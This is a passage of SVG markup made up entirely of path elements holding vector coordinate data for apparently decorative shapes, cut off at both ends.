d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path 